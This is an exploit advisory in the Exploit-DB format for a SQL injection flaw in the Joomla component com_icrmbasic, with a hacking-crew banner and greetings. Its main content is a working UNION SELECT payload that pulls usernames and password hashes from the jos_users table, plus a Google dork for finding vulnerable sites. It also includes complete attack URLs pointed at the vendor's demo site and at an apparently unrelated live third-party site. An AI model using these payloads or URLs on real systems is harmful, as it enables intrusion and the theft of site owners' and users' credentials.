Joomla! Component IRCm Basic - SQL Injection

EDB-ID:

9812

CVE:

N/A

Author:

kaMtiEz

Type:

webapps

Platform:

PHP

Published:

2009-09-28

################################################################################################
## Joomla Component com_ircmbasic SQL injection vulnerability 	                              ##
## Author : kaMtiEz (kamzcrew@gmail.com)						      ##
## Homepage : http://www.indonesiancoder.com    	     				      ##
## Date : September 27, 2009 								      ##
################################################################################################
# Hello My Name Is :                                                                          ##
#  __               _____   __  ._____________                                                ##
# |  | _______     /     \_/  |_|__\_   _____/_______                                         ##
# |  |/ /\__  \   /  \ /  \   __\  ||    __)_\___   /                                         ##
# |    <  / __ \_/    Y    \  | |  ||        \/    /                                          ##
# |__|_ \(____  /\____|__  /__| |__/_______  /_____ \                                         ##
#      \/     \/         \/                \/      \/ -=- INDONESIAN CODER -=- KILL-9 CREW -=-##
################################################################################################

[ Software Information ]

[+] Vendor : http://www.isygen.com/
[+] Download : http://www.isygen.com/index.php?option=com_content&view=article&id=53:icrmbasic&catid=34:general&Itemid=481
[+] version : -
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_icrmbasic"
[+] Location : INDONESIA

################################################################################################

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_icrmbasic&p1=m6&p3=[INDONESIANCODER]&p20=oab&p4=Contacts&p5=en-GB&Itemid=483

[ Exploit ]

-10+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users--

[ Vendor Demo Using com_icrmbasicdemo ]

http://www.isygen.com/index.php?option=com_icrmbasicdemo&v672=Contacts&v669=v694&v675=oab&v660=main&v656=-10+union+select+1,concat_ws(0x3a,username,password),3,password,username,6,7,8,9,10,11,12,13,14,15,16,17,18,19,version()tukulesto,21,22,23,24+from+jos_users--&v658=en-GB&Itemid=483

[ The Real com_icrmbasic Demo ]

http://ithinkbiz.com/index.php?option=com_icrmbasic&p1=m6&p3=-10+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users--&p20=oab&p4=Contacts&p5=en-GB&Itemid=483

################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER, TEAM KILL-9 CREW, KIRIK CREW, ServerIsDown, AntiSecurity.org
[+] Don Tukulesto, M3NW5, arianom, tiw0L, Jack-, Yadoy666, Pathloader, abah_benu, VycOd,
[+] Contrex, onthel, yasea, bugs, olivia, Jovan, Aar, Ardy, invent, Ronz, och3_an3h
[+] Coracore, black666girl, NepT, ichal, tengik, Gh4mb4s, rendy, devil_nongkrong and YOU!!

[ NOTE ] 

[+] makasih buad babe and enyak .... muach ..
[+] makasih buat om tukulesto yg menemani saia selalu dan enggak bosen ma gue .. hahaha
[+] gila 20 Jam duet ma tukulesto akhirnye ada hasil ^_^